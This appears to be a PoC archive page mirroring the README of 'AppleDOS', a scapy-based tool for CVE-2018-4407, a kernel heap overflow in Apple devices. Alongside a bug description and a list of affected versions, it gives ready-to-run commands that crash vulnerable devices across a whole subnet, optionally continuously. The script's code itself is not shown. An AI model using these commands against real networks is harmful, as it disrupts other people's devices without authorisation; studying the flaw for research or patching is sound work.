Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2018-4407 PoC — 多款Apple产品 Kernel 缓冲区错误漏洞

Source
https://github.com/farisv/AppleDOS
Associated Vulnerability
Title:多款Apple产品 Kernel 缓冲区错误漏洞 (CVE-2018-4407)
Description:Apple macOS High Sierra等都是美国苹果(Apple)公司的一套专为Mac计算机所开发的专用操作系统。 Apple macOS Sierra 10.12.6版本和macOS High Sierra 10.13.6版本中的Kernel组件存在安全漏洞。攻击者可利用该漏洞执行任意代码(内存损坏)。
Description
Messing Apple devices on the network with CVE-2018-4407 (heap overflow in bad packet handling)
Readme
# AppleDOS (CVE-2018-4407)

Based on CVE-2018-4407 (https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407), this [tweet](https://twitter.com/ihackbanme/status/1057811965945376768), and this [video](https://twitter.com/kevin_backhouse/status/1057352656560287746). The bug is heap overflow vulnerability in bad packet handling when OS try to send ICMP message containing segments from bad packet back to the sender.

![](demo.gif)

This POC will crashes the vulnerable Apple devices by sending bad TCP packet data containing long TCP/IP header options to overflow the ICMP message when device try to send out the error message. You need the ability to send network packet data directly to the device (e.g. on the same local network).

The following operating system versions and devices are vulnerable:
- Apple iOS 11 and earlier: all devices
- Apple macOS High Sierra, up to and including 10.13.6: all devices
- Apple macOS Sierra, up to and including 10.12.6: all devices
- Apple OS X El Capitan and earlier: all devices

## WARNING

FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES. THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.

## Example

Make sure you have Python 3 and scapy.

```
pip install scapy
# or
pip3 install scapy
```

You may need to run the script as root.

Send bad packet to 192.168.1.0/24 subnet.

```
sudo ./appledos.py 192.168.1.0/24
```

Shows IP after packet sent.

```
sudo ./appledos.py --verbose 192.168.1.0/24
```

Send bad packet to 192.168.1.0/24 subnet continuously.

```
sudo ./appledos.py --continuous 192.168.1.0/24
```

Change destination port (default: 80). You can change to any port since devices will respond to any incoming packet to any port but you may want to concern about port blocking or firewall in the host or network.

```
sudo ./appledos.py --continuous --port 22 192.168.1.0/24
```

Send bad packet to only one IP.

```
sudo ./appledos.py 192.168.1.118
```

Set maximum workers (default: 100).

```
sudo ./appledos.py --worker 10 192.168.1.0/24
```

## Note

This script is using scapy and it has known issue for handling `/dev/bpf` (Berkeley Packet Filter) when sending packet data from OS like macOS with multi-thread. If you encounter `No /dev/bpf handle is available`, try to reduce the worker number to 1 or 2. Or, you can just use Linux like in the demonstration video.
File Snapshot

 [4.0K]  /data/pocs/e482cbbaa67fd945e541c47dc5ab7635e1dd33ca
├── [3.7K]  appledos.py
├── [2.7M]  demo.gif
├── [1.0K]  LICENSE
└── [2.3K]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.